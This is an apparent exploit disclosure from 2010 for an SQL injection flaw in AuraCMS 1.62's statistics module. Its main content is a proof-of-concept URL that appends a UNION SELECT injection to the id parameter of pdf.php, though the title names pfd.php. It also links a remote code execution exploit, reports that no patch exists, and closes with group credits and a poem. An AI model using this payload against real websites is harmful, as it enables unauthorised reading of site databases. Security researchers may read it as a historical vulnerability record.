AuraCMS (pfd.php) SQL Injection Vulnerability
----------------------------------------------------------------------- |
Author : Arianom (arianom@indonesiancoder.com) |
Homepage : http://indonesiancoder.com |
Vendor : http://www.auracms.org/ |
Software : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html |
Version : 1.62 |
Date : November 22, 2010 |
----------------------------------------------------------------------- |
I. POC & Exploit |
----------------------------------------------------------------------- |
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7 |
II. Refrence |
----------------------------------------------------------------------- |
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit : http://www.exploit-db.com/exploits/4933/ |
III. Vendor patch |
----------------------------------------------------------------------- |
Currently manufacturers do not provide patches or upgrades. |
IV. Credits |
----------------------------------------------------------------------- |
Allahu Akbar |
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew |
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_ |
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader |
V. Poem |
----------------------------------------------------------------------- |
Kami adalah manusia biasa yang gemar belajar. |
Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka. |
Kami disini hanya ingin berbagi, bukan untuk bersaing. |
Indonesian Coder Family